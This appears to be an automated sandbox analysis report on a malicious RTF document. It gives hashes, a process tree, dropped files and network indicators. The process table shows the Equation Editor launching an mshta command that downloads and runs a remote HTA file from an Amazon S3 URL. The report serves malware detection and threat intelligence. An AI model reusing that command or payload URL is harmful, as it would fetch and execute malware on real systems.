| Field | Value |
|---|---|
| File name | 91561bdef37569a413556734f4176de4.rtf |
| Full analysis | https://app.any.run/tasks/63e11c96-dc63-467c-aade-fad7970c385d |
| Verdict | Malicious activity |
| Analysis date | May 21, 2019, 01:56:56 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | text/rtf |
| File info | Rich Text Format data, version 1, ANSI |
| MD5 | 91561BDEF37569A413556734F4176DE4 |
| SHA1 | FDBE452F7530761AB0818E5F65D99CBC96508F48 |
| SHA256 | 3F627582B50B61FBDEB1F3A8AFFB6AC332A11987C591C86FA02B3888B05CC235 |
| SSDEEP | 48:Mp54iWuutGfEjNMtvbDSj3xMa2763PMCphyD9LhQQQzQUAUxNhHb11gb90RCZNys:MwuUG5VoWxmEOyRFVS1E9fNDHy4h/1Nv |

| Extension | Identified format |
|---|---|
| .rtf | Rich Text Format (100) |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1212 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\91561bdef37569a413556734f4176de4.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| 872 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe |
| 552 | mshta https://s3.amazonaws.com/rewqqq/jksd/jk.hta | C:\Windows\system32\mshta.exe | | EQNEDT32.EXE |

Process details:

| PID | User | Company | Integrity level | Description | Exit code | Version |
|---|---|---|---|---|---|---|
| 1212 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 0 | 14.0.6024.1000 |
| 872 | admin | Design Science, Inc. | MEDIUM | Microsoft Equation Editor | 0 | 00110900 |
| 552 | admin | Microsoft Corporation | MEDIUM | Microsoft (R) HTML Application host | | 8.00.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR324E.tmp.cvr | — | — | — |
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FC7F81AF-9EF3-46EA-B1C4-C034180746C7}.tmp | — | — | — |
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{724A7071-CD0C-4CCC-9570-5104A8B83D59}.tmp | — | — | — |
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 4DF3E8AC277FFC6F4230911667B2677C | F5D9DC6B782BBC249AA5472A338E83B553EC57C575B6FCEB55D01F868EB090C2 |
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$561bdef37569a413556734f4176de4.rtf | pgc | 19FEE419C884DF5E12C88CA001247B00 | 7CB827E687140D11A8EE1C12C3495943BC958863924EC42F08611C35C209BD5E |
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{62D90A86-B78C-4F7A-BDE1-31C08E7B67B9}.tmp | binary | 32CEFE02C1B50B15DCF5FB8486DA0746 | 2E04E1280CEA8CA625C0775A1180D0F5F63EB9535298E94A1F9698A2F8768BEE |
| 1212 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4E8509C.wmf | wmf | 975B76E8E77D57CC386AF977A08B1E31 | 8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 552 | mshta.exe | 52.216.238.37:443 | s3.amazonaws.com | Amazon.com, Inc. | US | shared |

| Domain | IP | Reputation |
|---|---|---|
| s3.amazonaws.com | | shared |